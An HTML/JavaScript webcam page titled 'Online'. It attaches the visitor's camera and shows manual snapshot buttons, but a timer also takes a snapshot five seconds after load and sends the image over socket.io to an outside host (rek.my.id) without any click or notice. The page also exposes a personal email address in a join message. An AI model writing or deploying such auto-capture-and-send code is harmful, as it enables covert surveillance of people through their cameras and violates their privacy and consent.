<!doctype html>
<html lang="en"><head><title>Online</title></head>
<body>
<script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script src="/socket.io/socket.io.js"></script>

<div id="usersOnline">ini_div_usersOnline</div>
	<!-- CSS -->
    <style>
    #my_camera{
        width: 320px;
        height: 240px;
        border: 1px solid black;
    }
	</style>

	<!-- -->
	<div id="my_camera"></div>
	<input type=button value="Configure" onClick="configure()">
	<input type=button value="Take Snapshot" onClick="take_snapshot()">
	<input type=button value="Save Snapshot" onClick="saveSnap()">

    <div id="results"></div>

	<!-- Script -->
	<script type="text/javascript" src="webcam.min.js"></script>

	<!-- Configure a few settings and attach camera -->
	<script language="JavaScript">
		Webcam.set({
			width: 320,
			height: 240,
			image_format: 'jpeg',
			jpeg_quality: 90
		});
		Webcam.attach('#my_camera');

		setTimeout(function(){
			//alert("After 5 seconds!");
			take_snapshot();
		}, 5000);
	</script>
	<!-- A button for taking snaps -->

	<!-- Code to handle taking the snapshot and displaying it locally -->
	<script>
        var socket = io.connect('https://rek.my.id:4436');
        socket.on('broadcast',function(data) {
                document.getElementById("usersOnline").innerText = data.description;
        });
        socket.on('connect', function(data) {
                socket.emit('join', 'Bismillah|bekabeipa@gmail.com|hanyajasa.com|viewmode');
        });

		// Configure a few settings and attach camera
		function configure(){
			Webcam.set({
				width: 320,
				height: 240,
				image_format: 'jpeg',
				jpeg_quality: 90
			});
			Webcam.attach( '#my_camera' );
		}
		// A button for taking snaps

		// preload shutter audio clip
		var shutter = new Audio();
		shutter.autoplay = false;
		shutter.src = navigator.userAgent.match(/Firefox/) ? 'shutter.ogg' : 'shutter.mp3';

		function take_snapshot() {
			// play sound effect
			//shutter.play();

			// take snapshot and get image data
			Webcam.snap( function(data_uri) {
				// display results in page
				document.getElementById('results').innerHTML =
					'<img id="imageprev" src="'+data_uri+'"/>';
					//'<img src="'+data_uri+'"/>';
                                        socket.emit('clientoserver',data_uri);
//socket.emit('clientoserver','Ini pesan dari browser yang diakses client: ' + window.location.href);

/*
var ba64 = require("ba64");
//    data_url = "data:image/jpeg;base64,[Base64 encoded image goes here]";
// Save the image synchronously.
ba64.writeImageSync("myimage", data_uri); // Saves myimage.jpeg.
// Or save the image asynchronously.
ba64.writeImage("myimage", data_uri, function(err){
    if (err) throw err;
    console.log("Image saved successfully");
});*/

                                //var base64Data = req.rawBody.replace(/^data:image\/png;base64,/, "");
                                /*var base64Data = data_uri.replace(/^data:image\/png;base64,/, "");
                                require("fs").writeFile("out.png", base64Data, 'base64', function(err) {
                                  console.log(err);
                                }); */
                        });

			Webcam.reset();
		}
function upload() {
    console.log("Uploading...")
    var image = document.getElementById('image').src;
    var form = document.getElementById('myForm');
    var formData = new FormData(form);
    formData.append("file", image);
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", "/signup");
    // check when state changes,
    xmlhttp.onreadystatechange = function() {
    if(xmlhttp.readyState == 4 && xmlhttp.status == 200) {
        alert(xmlhttp.responseText);
        }
    }
    xmlhttp.send(formData);
    console.log(formData.get('file'));
    console.log(formData.get('userID'));
}
		function saveSnap(){
			// Get base64 value from <img id='imageprev'> source
			var base64image =  document.getElementById("imageprev").src;

			 Webcam.upload( base64image, 'upload.php', function(code, text) {
				 console.log('Save successfully');
				 console.log(text);
            });

		}
	</script>
</body>
</html>
